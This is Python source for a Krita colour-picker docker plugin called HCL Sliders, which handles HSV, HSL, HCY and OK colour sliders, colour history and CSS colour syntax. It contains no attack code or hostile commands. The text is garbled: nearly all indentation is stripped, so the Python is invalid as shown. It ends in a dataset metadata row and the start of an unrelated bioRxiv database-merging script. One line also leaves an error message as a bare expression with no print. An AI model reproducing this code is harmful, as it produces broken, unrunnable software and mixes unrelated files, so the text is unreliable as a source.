interval.setMaximum(360.0)
interval.setSuffix(u'\N{DEGREE SIGN}')
displacement.setMaximum(359.9)
displacement.setSuffix(u'\N{DEGREE SIGN}')
colorful = QCheckBox("Colorful Gradient")
colorful.setToolTip("Gradient colors will always be at max chroma")
colorful.setChecked(channel.colorful)
colorful.toggled.connect(channel.colorfulHue)
tabLayout.addStretch()
tabLayout.addWidget(colorful)
else:
interval.setMaximum(100.0)
interval.setSuffix('%')
displacement.setSuffix('%')
interval.setValue(channel.slider.interval)
interval.valueChanged.connect(channel.slider.setInterval)
displacement.setValue(channel.slider.displacement)
displacement.valueChanged.connect(channel.slider.setDisplacement)
tabs.addTab(tab, param)
checkBox = QCheckBox()
checkBox.setChecked(not((model in visible) and (name in hidden)))
tab.setEnabled(checkBox.isChecked())
self.checkBoxes[name] = checkBox
tabs.tabBar().setTabButton(tabs.tabBar().count() - 1,
tabs.tabBar().ButtonPosition.LeftSide, checkBox)
checkBox.toggled.connect(tab.setEnabled)
checkBox.stateChanged.connect(self.reorderSliders)
tabs.tabBar().tabMoved.connect(self.reorderSliders)
self.pages.addWidget(tabs)
self.pageList.addItem(model)
item = self.pageList.item(self.pageList.count() - 1)
item.setFlags(item.flags() | Qt.ItemFlag.ItemIsUserCheckable)
            item.setCheckState(Qt.CheckState.Checked if model in visible
                               else Qt.CheckState.Unchecked)
tabs.setEnabled(item.checkState() == Qt.CheckState.Checked)
self.pageList.model().rowsMoved.connect(self.reorderSliders)
self.pageList.itemPressed.connect(self.changePage)
self.pageList.currentTextChanged.connect(self.changePage)
self.pageList.itemChanged.connect(self.toggleModel)
self.others = QPushButton("Others")
self.others.setAutoDefault(False)
self.others.setCheckable(True)
self.others.setFixedWidth(SIDEBAR_WIDTH)
self.others.clicked.connect(self.changeOthers)
history = QGroupBox("Color History")
history.setFixedHeight(GROUPBOX_HEIGHT)
history.setToolTip("Records foreground color when changed")
history.setCheckable(True)
history.setChecked(self.hcl.history.isEnabled())
history.toggled.connect(self.refreshOthers)
memory = QSpinBox()
memory.setFixedWidth(SPINBOX_WIDTH)
memory.setMaximum(999)
memory.setValue(self.hcl.memory)
memory.valueChanged.connect(self.hcl.setMemory)
memoryLabel = QLabel("Memory")
memoryLabel.setToolTip("Limits color history, set to 0 for unlimited")
clearButton = QPushButton("Clear History")
clearButton.setAutoDefault(False)
clearButton.setToolTip("Removes all colors in history")
clearButton.clicked.connect(self.hcl.clearHistory)
historyLayout = QHBoxLayout()
historyLayout.addWidget(memory)
historyLayout.addWidget(memoryLabel)
historyLayout.addWidget(clearButton)
history.setLayout(historyLayout)
syntax = QCheckBox("Color Syntax")
syntax.setToolTip("Panel for hex/oklab/oklch css syntax")
syntax.setChecked(self.hcl.syntax.isEnabled())
syntax.stateChanged.connect(self.refreshOthers)
othersTab = QWidget()
pageLayout = QVBoxLayout()
pageLayout.addSpacing(OTHERS_HEIGHT)
pageLayout.addWidget(history)
pageLayout.addStretch()
pageLayout.addWidget(syntax)
pageLayout.addStretch()
othersTab.setLayout(pageLayout)
othersPage = QTabWidget()
othersPage.addTab(othersTab, "Other Settings")
self.pages.addWidget(othersPage)
listLayout = QVBoxLayout()
listLayout.addWidget(self.pageList)
listLayout.addWidget(self.others)
self.mainLayout.addLayout(listLayout)
self.mainLayout.addWidget(self.pages)
def changePage(self, item: str|QListWidgetItem):
if isinstance(item, QListWidgetItem):
item = item.text()
self.pages.setCurrentIndex(list(self.models.keys()).index(item))
self.others.setChecked(False)
def changeOthers(self):
self.others.setChecked(True)
self.pages.setCurrentIndex(self.pages.count() - 1)
self.pageList.clearSelection()
def refreshOthers(self, state: bool|int):
# toggled vs stateChanged
if isinstance(state, bool):
self.hcl.history.setEnabled(state)
else:
state = state == Qt.CheckState.Checked
self.hcl.syntax.setEnabled(state)
# Refresh hcl layout
self.hcl.clearOthers()
self.hcl.displayOthers()
def reorderSliders(self):
# Get new display order
self.hcl.displayOrder = []
for row in range(self.pageList.count()):
item = self.pageList.item(row)
if item.checkState() == Qt.CheckState.Checked:
model = item.text()
tabs = self.pages.widget(list(self.models.keys()).index(model))
for index in range(tabs.count()):
# visible tabs have '&' in text used for shortcut
param = tabs.tabText(index).replace('&', '')
name = f"{model.lower()}{param}"
if self.checkBoxes[name].isChecked():
self.hcl.displayOrder.append(name)
# Refresh channel layout
self.hcl.clearChannels()
self.hcl.displayChannels()
def toggleModel(self, item: QListWidgetItem):
tabs = self.pages.widget(list(self.models.keys()).index(item.text()))
tabs.setEnabled(item.checkState() == Qt.CheckState.Checked)
self.reorderSliders()
def closeEvent(self, event):
self.hcl.writeSettings()
event.accept()
class HCLSliders(DockWidget):
def __init__(self):
super().__init__()
self.setWindowTitle(DOCKER_NAME)
mainWidget = QWidget(self)
mainWidget.setContentsMargins(2, 1, 2, 1)
self.setWidget(mainWidget)
self.mainLayout = QVBoxLayout(mainWidget)
self.mainLayout.setSpacing(2)
self.config = None
self.document = None
self.memory = 30
self.trc = "sRGB"
self.notation = NOTATION[0]
self.text = ""
self.pressed = False
self.editing = False
self.pastColors = []
self.loadChannels()
self.history = ColorHistory(self)
self.loadSyntax()
self.readSettings()
self.displayChannels()
self.displayOthers()
self.updateNotations()
def colorDisplay(self):
# load into channel layout to prevent alignment issue when channels empty
layout = QHBoxLayout()
layout.setSpacing(2)
self.color = ColorDisplay(self)
self.color.setFixedHeight(DISPLAY_HEIGHT)
layout.addWidget(self.color)
button = QPushButton()
button.setIcon(Application.icon('configure'))
button.setFlat(True)
button.setFixedSize(DISPLAY_HEIGHT, DISPLAY_HEIGHT)
button.setIconSize(QSize(DISPLAY_HEIGHT - 2, DISPLAY_HEIGHT - 2))
button.setToolTip("Configure HCL Sliders")
button.clicked.connect(self.openConfig)
layout.addWidget(button)
self.timer = QTimer()
self.timer.timeout.connect(self.getKritaColors)
self.singleShot = QTimer()
self.singleShot.setSingleShot(True)
self.singleShot.timeout.connect(self.setHistory)
return layout
def loadChannels(self):
self.channelLayout = QVBoxLayout()
self.channelLayout.setAlignment(Qt.AlignmentFlag.AlignTop)
self.channelLayout.setSpacing(2)
self.channelLayout.addLayout(self.colorDisplay())
self.channelLayout.addSpacing(1)
self.hsvHue = ColorChannel("hsvHue", self)
self.hsvSaturation = ColorChannel("hsvSaturation", self)
self.hsvValue = ColorChannel("hsvValue", self)
self.hslHue = ColorChannel("hslHue", self)
self.hslSaturation = ColorChannel("hslSaturation", self)
self.hslLightness = ColorChannel("hslLightness", self)
self.hcyHue = ColorChannel("hcyHue", self)
self.hcyHue.scale = False
self.hcyChroma = ColorChannel("hcyChroma", self)
self.hcyLuma = ColorChannel("hcyLuma", self)
self.hcyLuma.scale = False
self.okhclHue = ColorChannel("okhclHue", self)
self.okhclHue.scale = False
self.okhclChroma = ColorChannel("okhclChroma", self)
self.okhclLightness = ColorChannel("okhclLightness", self)
self.okhclLightness.scale = False
self.okhsvHue = ColorChannel("okhsvHue", self)
self.okhsvSaturation = ColorChannel("okhsvSaturation", self)
self.okhsvValue = ColorChannel("okhsvValue", self)
self.okhslHue = ColorChannel("okhslHue", self)
self.okhslSaturation = ColorChannel("okhslSaturation", self)
self.okhslLightness = ColorChannel("okhslLightness", self)
self.mainLayout.addLayout(self.channelLayout)
def loadSyntax(self):
self.prevNotation = QPushButton()
self.prevNotation.setFlat(True)
self.prevNotation.setFixedSize(CHANNEL_HEIGHT - 1, CHANNEL_HEIGHT - 1)
self.prevNotation.setIcon(Application.icon('arrow-left'))
self.prevNotation.setIconSize(QSize(CHANNEL_HEIGHT - 5, CHANNEL_HEIGHT - 5))
self.prevNotation.clicked.connect(self.switchNotation)
self.nextNotation = QPushButton()
self.nextNotation.setFlat(True)
self.nextNotation.setFixedSize(CHANNEL_HEIGHT - 1, CHANNEL_HEIGHT - 1)
self.nextNotation.setIcon(Application.icon('arrow-right'))
self.nextNotation.setIconSize(QSize(CHANNEL_HEIGHT - 5, CHANNEL_HEIGHT - 5))
self.nextNotation.clicked.connect(self.switchNotation)
self.syntax = QLineEdit()
self.syntax.setFixedHeight(CHANNEL_HEIGHT - 1)
self.syntax.setAlignment(Qt.AlignmentFlag.AlignCenter)
self.syntax.editingFinished.connect(self.parseSyntax)
def readSettings(self):
channels = ColorChannel.getList()
for name in channels:
settings: list = Application.readSetting(DOCKER_NAME, name, "").split(",")
if len(settings) > 1:
channel: ColorChannel = getattr(self, name)
try:
channel.slider.setInterval(float(settings[0]))
except ValueError:
print(f"Invalid interval amount for {name}")
try:
channel.slider.setDisplacement(float(settings[1]))
except ValueError:
print(f"Invalid displacement amount for {name}")
if (name[:3] == "hcy" or name[:5] == "okhcl") and name[-6:] != "Chroma":
channel.scale = settings[2] == "True"
if name[-3:] == "Hue":
if len(settings) > 3:
channel.colorful = settings[3] == "True"
else:
channel.colorful = settings[2] == "True"
if name[:3] == "hcy":
channel.luma = settings[-1] == "True"
self.displayOrder = []
empty = False
displayed = Application.readSetting(DOCKER_NAME, "displayed", "").split(",")
for name in displayed:
if name in channels:
self.displayOrder.append(name)
elif name == "None":
empty = True
break
if not self.displayOrder and not empty:
self.displayOrder = channels
history = Application.readSetting(DOCKER_NAME, "history", "").split(",")
if len(history) == 2:
self.history.setEnabled(history[0] != "False")
try:
memory = int(history[1])
if 0 <= memory <= 999:
self.memory = memory
except ValueError:
("Invalid memory value")
syntax = Application.readSetting(DOCKER_NAME, "syntax", "").split(",")
if len(syntax) == 2:
self.syntax.setEnabled(syntax[0] != "False")
notation = syntax[1]
if notation in NOTATION:
self.notation = notation
def writeSettings(self):
Application.writeSetting(DOCKER_NAME, "displayed", ",".join(self.displayOrder) if self.displayOrder else "None")
for name in ColorChannel.getList():
settings = []
channel: ColorChannel = getattr(self, name)
settings.append(str(channel.slider.interval))
settings.append(str(channel.slider.displacement))
if (name[:3] == "hcy" or name[:5] == "okhcl") and name[-6:] != "Chroma":
settings.append(str(channel.scale))
if name[-3:] == "Hue":
settings.append(str(channel.colorful))
if name[:3] == "hcy":
settings.append(str(channel.luma))
Application.writeSetting(DOCKER_NAME, name, ",".join(settings))
history = [str(self.history.isEnabled()), str(self.memory)]
Application.writeSetting(DOCKER_NAME, "history", ",".join(history))
syntax = [str(self.syntax.isEnabled()), self.notation]
Application.writeSetting(DOCKER_NAME, "syntax", ",".join(syntax))
def displayChannels(self):
prev = ""
for name in self.displayOrder:
if MODEL_SPACING:
model = name[:5] if name[:2] == "ok" else name[:3]
if prev and prev != model:
self.channelLayout.addSpacing(MODEL_SPACING)
prev = model
channel = getattr(self, name)
channel.layout.addWidget(channel.label)
channel.layout.addWidget(channel.slider)
channel.layout.addWidget(channel.spinBox)
self.channelLayout.addLayout(channel.layout)
def clearChannels(self):
        # the first 2 items in channelLayout are the color display and spacing
for i in reversed(range(self.channelLayout.count() - 2)):
item = self.channelLayout.itemAt(i + 2)
layout = item.layout()
if layout:
for index in reversed(range(layout.count())):
widget = layout.itemAt(index).widget()
layout.removeWidget(widget)
widget.setParent(None)
self.channelLayout.removeItem(item)
def displayOthers(self):
if self.history.isEnabled():
self.mainLayout.addSpacing(1)
self.mainLayout.addWidget(self.history)
if self.syntax.isEnabled():
self.mainLayout.addSpacing(1)
syntaxLayout = QHBoxLayout()
syntaxLayout.addWidget(self.prevNotation)
syntaxLayout.addWidget(self.syntax)
syntaxLayout.addWidget(self.nextNotation)
self.mainLayout.addLayout(syntaxLayout)
def clearOthers(self):
# first item in mainLayout is channelLayout
for i in reversed(range(self.mainLayout.count() - 1)):
item = self.mainLayout.itemAt(i + 1)
widget = item.widget()
if widget:
self.mainLayout.removeWidget(widget)
widget.setParent(None)
else:
layout = item.layout()
if layout:
for index in reversed(range(layout.count())):
widget = layout.itemAt(index).widget()
layout.removeWidget(widget)
widget.setParent(None)
self.mainLayout.removeItem(item)
def openConfig(self):
if self.config is None:
self.config = SliderConfig(self)
self.config.show()
def profileTRC(self, profile: str):
if profile in SRGB:
return "sRGB"
elif profile in LINEAR:
return "linear"
print("Incompatible profile")
return self.trc
def setMemory(self, memory: int):
self.memory = memory
def setPressed(self, pressed: bool):
self.pressed = pressed
def finishEditing(self):
self.editing = False
def getKritaColors(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
if not self.pressed and not self.editing:
# add to color history after slider sets color
if self.color.isChanged() and self.color.current:
self.setHistory()
foreground = view.foregroundColor()
self.color.setForeGroundColor(foreground)
background = view.backgroundColor()
self.color.setBackGroundColor(background)
if self.color.isChanged():
if self.color.bgMode:
self.color.setCurrentColor(background)
else:
self.color.setCurrentColor(foreground)
current = self.color.current
rgb = tuple(current.componentsOrdered()[:3])
if current.colorModel() != "RGBA":
if current.colorModel() == "A" or current.colorModel() == "GRAYA":
rgb = (rgb[0], rgb[0], rgb[0])
else:
return
trc = self.profileTRC(current.colorProfile())
self.updateSyntax(rgb, trc)
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
self.updateChannels(rgb)
# add to color history after krita changes color
if not self.singleShot.isActive():
self.color.recent = current
self.singleShot.start(DELAY)
def blockChannels(self, block: bool):
# hsv
self.hsvHue.blockSignals(block)
self.hsvSaturation.blockSignals(block)
self.hsvValue.blockSignals(block)
# hsl
self.hslHue.blockSignals(block)
self.hslSaturation.blockSignals(block)
self.hslLightness.blockSignals(block)
# hcy
self.hcyHue.blockSignals(block)
self.hcyChroma.blockSignals(block)
self.hcyLuma.blockSignals(block)
# okhcl
self.okhclHue.blockSignals(block)
self.okhclChroma.blockSignals(block)
self.okhclLightness.blockSignals(block)
# okhsv
self.okhsvHue.blockSignals(block)
self.okhsvSaturation.blockSignals(block)
self.okhsvValue.blockSignals(block)
# okhsl
self.okhslHue.blockSignals(block)
self.okhslSaturation.blockSignals(block)
self.okhslLightness.blockSignals(block)
def updateChannels(self, values: tuple|float, name: str=None, widget: str=None):
self.timer.stop()
self.blockChannels(True)
if type(values) is tuple:
# update color from krita that is not adjusted by this plugin
self.setChannelValues("hsv", values)
self.setChannelValues("hsl", values)
self.setChannelValues("hcy", values)
self.setChannelValues("okhcl", values)
self.setChannelValues("okhsv", values)
self.setChannelValues("okhsl", values)
else:
# update slider if spinbox adjusted vice versa
channel: ColorChannel = getattr(self, name)
channelWidget = getattr(channel, widget)
channelWidget.setValue(values)
if widget == "slider":
# prevent getKritaColors when still editing spinBox
self.editing = True
# adjusting hsv sliders
if name[:3] == "hsv":
hue = self.hsvHue.value()
rgb = Convert.hsvToRgbF(hue, self.hsvSaturation.value(),
self.hsvValue.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsl", rgb, hue)
if self.hcyLuma.luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, hue)
else:
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting hsl sliders
elif name[:3] == "hsl":
hue = self.hslHue.value()
rgb = Convert.hslToRgbF(hue, self.hslSaturation.value(),
self.hslLightness.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb, hue)
if self.hcyLuma.luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, hue)
else:
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting hcy sliders
elif name[:3] == "hcy":
hue = self.hcyHue.value()
chroma = self.hcyChroma.value()
limit = -1
if channel.scale:
if self.hcyChroma.limit > 0:
self.hcyChroma.clip = chroma
limit = self.hcyChroma.limit
else:
if self.hcyChroma.clip == 0:
self.hcyChroma.clip = chroma
else:
chroma = self.hcyChroma.clip
rgb = Convert.hcyToRgbF(hue, chroma, self.hcyLuma.value(),
limit, self.trc, channel.luma)
self.setKritaColor(rgb)
if name[-6:] != "Chroma":
hcy = Convert.rgbFToHcy(*rgb, hue, self.trc, channel.luma)
self.hcyChroma.setLimit(hcy[3])
self.hcyChroma.setValue(hcy[1])
                # relative luminance doesn't match luma in hue
if channel.luma or self.trc == "sRGB":
self.setChannelValues("hsv", rgb, hue)
self.setChannelValues("hsl", rgb, hue)
else:
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting okhcl sliders
elif name[:5] == "okhcl":
hue = self.okhclHue.value()
chroma = self.okhclChroma.value()
limit = -1
if channel.scale:
if self.okhclChroma.limit > 0:
self.okhclChroma.clip = chroma
limit = self.okhclChroma.limit
else:
if self.okhclChroma.clip == 0:
self.okhclChroma.clip = chroma
else:
chroma = self.okhclChroma.clip
rgb = Convert.okhclToRgbF(hue, chroma, self.okhclLightness.value(), limit, self.trc)
self.setKritaColor(rgb)
if name[-6:] != "Chroma":
okhcl = Convert.rgbFToOkhcl(*rgb, hue, self.trc)
self.okhclChroma.setLimit(okhcl[3])
self.okhclChroma.setValue(okhcl[1])
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhsv", rgb, hue)
self.setChannelValues("okhsl", rgb, hue)
# adjusting okhsv sliders
elif name[:5] == "okhsv":
hue = self.okhsvHue.value()
rgb = Convert.okhsvToRgbF(hue, self.okhsvSaturation.value(),
self.okhsvValue.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb, hue)
self.setChannelValues("okhsl", rgb, hue)
# adjusting okhsl sliders
elif name[:5] == "okhsl":
hue = self.okhslHue.value()
rgb = Convert.okhslToRgbF(hue, self.okhslSaturation.value(),
self.okhslLightness.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb, hue)
self.setChannelValues("okhsv", rgb, hue)
self.updateChannelGradients()
self.blockChannels(False)
if TIME:
self.timer.start(TIME)
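    # Usage sketch for updateChannels (values are illustrative only): it is called either with a
    # full (r, g, b) tuple when the colour comes from outside the sliders (Krita, the history or
    # the syntax box), e.g. self.updateChannels((0.5, 0.2, 0.8)), or with a single float plus the
    # channel attribute name and the counterpart widget to sync, e.g.
    # self.updateChannels(180.0, "hsvHue", "slider") after that channel's spin box was edited;
    # the remaining colour models are then recomputed from the resulting rgb.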
def updateChannelGradients(self, channels: str=None):
if not channels or channels == "hsv":
self.hsvHue.updateGradientColors(self.hsvSaturation.value(), self.hsvValue.value(),
self.trc)
self.hsvSaturation.updateGradientColors(self.hsvHue.value(), self.hsvValue.value(),
self.trc)
self.hsvValue.updateGradientColors(self.hsvHue.value(), self.hsvSaturation.value(),
self.trc)
if not channels or channels == "hsl":
self.hslHue.updateGradientColors(self.hslSaturation.value(), self.hslLightness.value(),
self.trc)
self.hslSaturation.updateGradientColors(self.hslHue.value(), self.hslLightness.value(),
self.trc)
self.hslLightness.updateGradientColors(self.hslHue.value(), self.hslSaturation.value(),
self.trc)
if not channels or channels == "hcy":
hcyClip = self.hcyChroma.value()
if self.hcyChroma.clip > 0:
hcyClip = self.hcyChroma.clip
if self.hcyHue.scale:
self.hcyHue.updateGradientColors(self.hcyChroma.value(), self.hcyLuma.value(),
self.trc, self.hcyChroma.limit)
else:
self.hcyHue.updateGradientColors(hcyClip, self.hcyLuma.value(), self.trc)
self.hcyChroma.updateGradientColors(self.hcyHue.value(), self.hcyLuma.value(),
self.trc, self.hcyChroma.limit)
if self.hcyLuma.scale:
self.hcyLuma.updateGradientColors(self.hcyHue.value(), self.hcyChroma.value(),
self.trc, self.hcyChroma.limit)
else:
self.hcyLuma.updateGradientColors(self.hcyHue.value(), hcyClip, self.trc)
if not channels or channels == "okhcl":
okhclClip = self.okhclChroma.value()
if self.okhclChroma.clip > 0:
okhclClip = self.okhclChroma.clip
if self.okhclHue.scale:
self.okhclHue.updateGradientColors(self.okhclChroma.value(), self.okhclLightness.value(),
self.trc, self.okhclChroma.limit)
else:
self.okhclHue.updateGradientColors(okhclClip, self.okhclLightness.value(), self.trc)
self.okhclChroma.updateGradientColors(self.okhclHue.value(), self.okhclLightness.value(),
self.trc, self.okhclChroma.limit)
if self.okhclLightness.scale:
self.okhclLightness.updateGradientColors(self.okhclHue.value(), self.okhclChroma.value(),
self.trc, self.okhclChroma.limit)
else:
self.okhclLightness.updateGradientColors(self.okhclHue.value(), okhclClip, self.trc)
if not channels or channels == "okhsv":
self.okhsvHue.updateGradientColors(self.okhsvSaturation.value(),
self.okhsvValue.value(), self.trc)
self.okhsvSaturation.updateGradientColors(self.okhsvHue.value(),
self.okhsvValue.value(), self.trc)
self.okhsvValue.updateGradientColors(self.okhsvHue.value(),
self.okhsvSaturation.value(), self.trc)
if not channels or channels == "okhsl":
self.okhslHue.updateGradientColors(self.okhslSaturation.value(),
self.okhslLightness.value(), self.trc)
self.okhslSaturation.updateGradientColors(self.okhslHue.value(),
self.okhslLightness.value(), self.trc)
self.okhslLightness.updateGradientColors(self.okhslHue.value(),
self.okhslSaturation.value(), self.trc)
def setChannelValues(self, channels: str, rgb: tuple, hue: float=-1):
if channels == "hsv":
hsv = Convert.rgbFToHsv(*rgb, self.trc)
if hue != -1:
self.hsvHue.setValue(hue)
elif hsv[1] > 0:
self.hsvHue.setValue(hsv[0])
if hsv[2] > 0:
self.hsvSaturation.setValue(hsv[1])
self.hsvValue.setValue(hsv[2])
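            # note: hue is left untouched for achromatic colours (saturation 0) and saturation is
            # left untouched for black (value 0), where those components are undefined, so the
            # user's last slider positions survive; similar guards appear in several branches below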
elif channels == "hsl":
hsl = Convert.rgbFToHsl(*rgb, self.trc)
if hue != -1:
self.hslHue.setValue(hue)
elif hsl[1] > 0:
self.hslHue.setValue(hsl[0])
if hsl[2] > 0:
self.hslSaturation.setValue(hsl[1])
self.hslLightness.setValue(hsl[2])
elif channels == "hcy":
self.hcyChroma.clip = 0.0
hcy = Convert.rgbFToHcy(*rgb, self.hcyHue.value(), self.trc, self.hcyLuma.luma)
if hue != -1:
self.hcyHue.setValue(hue)
elif hcy[1] > 0:
self.hcyHue.setValue(hcy[0])
# must always set limit before setting chroma value
self.hcyChroma.setLimit(hcy[3])
self.hcyChroma.setValue(hcy[1])
self.hcyLuma.setValue(hcy[2])
elif channels == "okhcl":
self.okhclChroma.clip = 0.0
okhcl = Convert.rgbFToOkhcl(*rgb, self.okhclHue.value(), self.trc)
if hue != -1:
self.okhclHue.setValue(hue)
else:
self.okhclHue.setValue(okhcl[0])
# must always set limit before setting chroma value
self.okhclChroma.setLimit(okhcl[3])
self.okhclChroma.setValue(okhcl[1])
self.okhclLightness.setValue(okhcl[2])
elif channels == "okhsv":
okhsv = Convert.rgbFToOkhsv(*rgb, self.trc)
if hue != -1:
self.okhsvHue.setValue(hue)
elif okhsv[1] > 0:
self.okhsvHue.setValue(okhsv[0])
if okhsv[2] > 0:
self.okhsvSaturation.setValue(okhsv[1])
self.okhsvValue.setValue(okhsv[2])
elif channels == "okhsl":
okhsl = Convert.rgbFToOkhsl(*rgb, self.trc)
if hue != -1:
self.okhslHue.setValue(hue)
elif okhsl[1] > 0:
self.okhslHue.setValue(okhsl[0])
if okhsl[2] > 0:
self.okhslSaturation.setValue(okhsl[1])
self.okhslLightness.setValue(okhsl[2])
def makeManagedColor(self, rgb: tuple, profile: str=None):
model = "RGBA"
depth = self.document.colorDepth()
if not profile:
if self.trc == "sRGB":
profile = SRGB[0]
else:
profile = LINEAR[0]
elif profile not in Application.profiles(model, depth):
models = filter(lambda cm: cm != "RGBA", Application.colorModels())
for cm in models:
if profile in Application.profiles(cm, depth):
model = cm
break
color = ManagedColor(model, depth, profile)
components = color.components()
# support for other models in the future
if model == "RGBA":
# unordered sequence is BGRA for uint but RGBA for float
if depth[0] == "U":
components[0] = rgb[2]
components[1] = rgb[1]
components[2] = rgb[0]
else:
components[0] = rgb[0]
components[1] = rgb[1]
components[2] = rgb[2]
components[3] = 1.0
color.setComponents(components)
return color
elif model == "A" or model == "GRAYA":
components[0] = rgb[0]
components[1] = 1.0
color.setComponents(components)
return color
def setKritaColor(self, rgb: tuple):
view = Application.activeWindow().activeView()
if not view.visible():
return
color = self.makeManagedColor(rgb)
if color:
self.color.setCurrentColor(color)
self.updateSyntax(rgb, self.trc)
if self.color.bgMode:
view.setBackGroundColor(color)
else:
view.setForeGroundColor(color)
self.color.recent = color
def setLuma(self, luma: bool):
self.timer.stop()
self.blockChannels(True)
self.hcyHue.luma = luma
self.hcyChroma.luma = luma
self.hcyLuma.luma = luma
if self.color.current:
rgb = tuple(self.color.current.componentsOrdered()[:3])
trc = self.profileTRC(self.color.current.colorProfile())
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
if luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, self.hsvHue.value())
else:
self.setChannelValues("hcy", rgb)
self.updateChannelGradients("hcy")
self.blockChannels(False)
if TIME:
self.timer.start(TIME)
def setHistory(self):
if self.color.isChanging():
# allow getKritaColors to start timer for set history
self.color.current = None
return
current = self.color.current
rgb = tuple(current.componentsOrdered()[:3])
if current.colorModel() == "A" or current.colorModel() == "GRAYA":
rgb = (rgb[0], rgb[0], rgb[0])
profile = current.colorProfile()
color = (rgb, profile)
if color in self.pastColors:
index = self.pastColors.index(color)
if index:
self.pastColors.pop(index)
self.pastColors.insert(0, color)
item = self.history.takeItem(index)
self.history.insertItem(0, item)
else:
self.pastColors.insert(0, color)
pixmap = QPixmap(HISTORY_HEIGHT, HISTORY_HEIGHT)
pixmap.fill(QColor(*Convert.rgbFToInt8(*rgb, self.profileTRC(profile))))
item = QListWidgetItem()
item.setIcon(QIcon(pixmap))
self.history.insertItem(0, item)
if self.memory:
for i in reversed(range(self.history.count())):
if i > self.memory - 1:
self.history.takeItem(i)
self.pastColors.pop()
else:
break
self.history.horizontalScrollBar().setValue(0)
def setPastColor(self, index: int, fg=True):
view = Application.activeWindow().activeView()
if not view.visible():
return
if (self.color.bgMode and not fg) or (fg and not self.color.bgMode):
self.history.takeItem(index)
color = self.pastColors.pop(index)
rgb = color[0]
trc = self.profileTRC(color[1])
self.updateSyntax(rgb, trc)
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
self.updateChannels(rgb)
current = self.color.current
if fg:
view.setForeGroundColor(current)
# prevent setHistory again during getKritaColors
self.color.setForeGroundColor(current)
else:
view.setBackGroundColor(current)
# prevent setHistory again during getKritaColors
self.color.setBackGroundColor(current)
self.color.recent = current
self.setHistory()
else:
temp = self.color.temp
if fg:
view.setForeGroundColor(temp)
self.color.setForeGroundColor(temp)
else:
view.setBackGroundColor(temp)
self.color.setBackGroundColor(temp)
def clearHistory(self):
self.history.clear()
self.pastColors = []
def updateSyntax(self, rgb: tuple, trc: str):
if self.notation == NOTATION[0]:
self.text = Convert.rgbFToHexS(*rgb, trc)
elif self.notation == NOTATION[1]:
self.text = Convert.rgbFToOklabS(*rgb, trc)
elif self.notation == NOTATION[2]:
self.text = Convert.rgbFToOklchS(*rgb, trc)
self.syntax.setText(self.text)
def switchNotation(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
notation = self.sender().toolTip()
self.setNotation(notation)
self.updateNotations()
color = view.foregroundColor()
trc = self.profileTRC(color.colorProfile())
self.updateSyntax(color.componentsOrdered()[:3], trc)
def setNotation(self, notation: str):
self.notation = notation
# syntax needs to be on to set notation currently
Application.writeSetting(DOCKER_NAME, "syntax", ",".join(["True", notation]))
def updateNotations(self):
i = NOTATION.index(self.notation)
if i == 0:
self.prevNotation.setToolTip(NOTATION[len(NOTATION) - 1])
self.nextNotation.setToolTip(NOTATION[i + 1])
elif i == len(NOTATION) - 1:
self.prevNotation.setToolTip(NOTATION[i - 1])
self.nextNotation.setToolTip(NOTATION[0])
else:
self.prevNotation.setToolTip(NOTATION[i - 1])
self.nextNotation.setToolTip(NOTATION[i + 1])
def parseSyntax(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
syntax = self.syntax.text().strip()
if syntax == self.text:
return
rgb = None
notation = self.notation
if syntax[:1] == "#":
self.setNotation(NOTATION[0])
rgb = Convert.hexSToRgbF(syntax, self.trc)
elif syntax[:5].upper() == NOTATION[1]:
self.setNotation(NOTATION[1])
rgb = Convert.oklabSToRgbF(syntax, self.trc)
elif syntax[:5].upper() == NOTATION[2]:
self.setNotation(NOTATION[2])
rgb = Convert.oklchSToRgbF(syntax, self.trc)
if notation != self.notation:
self.updateNotations()
if rgb:
self.setKritaColor(rgb)
self.updateChannels(rgb)
else:
color = view.foregroundColor()
trc = self.profileTRC(color.colorProfile())
self.updateSyntax(color.componentsOrdered()[:3], trc)
def showEvent(self, event):
if TIME:
self.timer.start(TIME)
def closeEvent(self, event):
self.timer.stop()
def canvasChanged(self, canvas):
if self.document != Application.activeDocument():
self.document = Application.activeDocument()
self.trc = self.profileTRC(self.document.colorProfile())
self.color.resetColors()
self.syntax.setText("")
self.getKritaColors()
| 75,549 | Python | .py | 1,604 | 33.4202 | 120 | 0.575525 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,183 | combine_databases.py | dzyla_biorxiv_search/combine_databases.py | import pandas as pd
import numpy as np
from pathlib import Path
def combine_databases():
# Define paths
aggregated_data_path = Path("aggregated_data")
db_update_bio_path = Path("db_update")
biorxiv_embeddings_path = Path("biorxiv_ubin_embaddings.npy")
embed_update_bio_path = Path("embed_update")
db_update_med_path = Path("db_update_med")
embed_update_med_path = Path("embed_update_med")
# Load existing database and embeddings for BioRxiv
df_bio_existing = pd.read_parquet(aggregated_data_path)
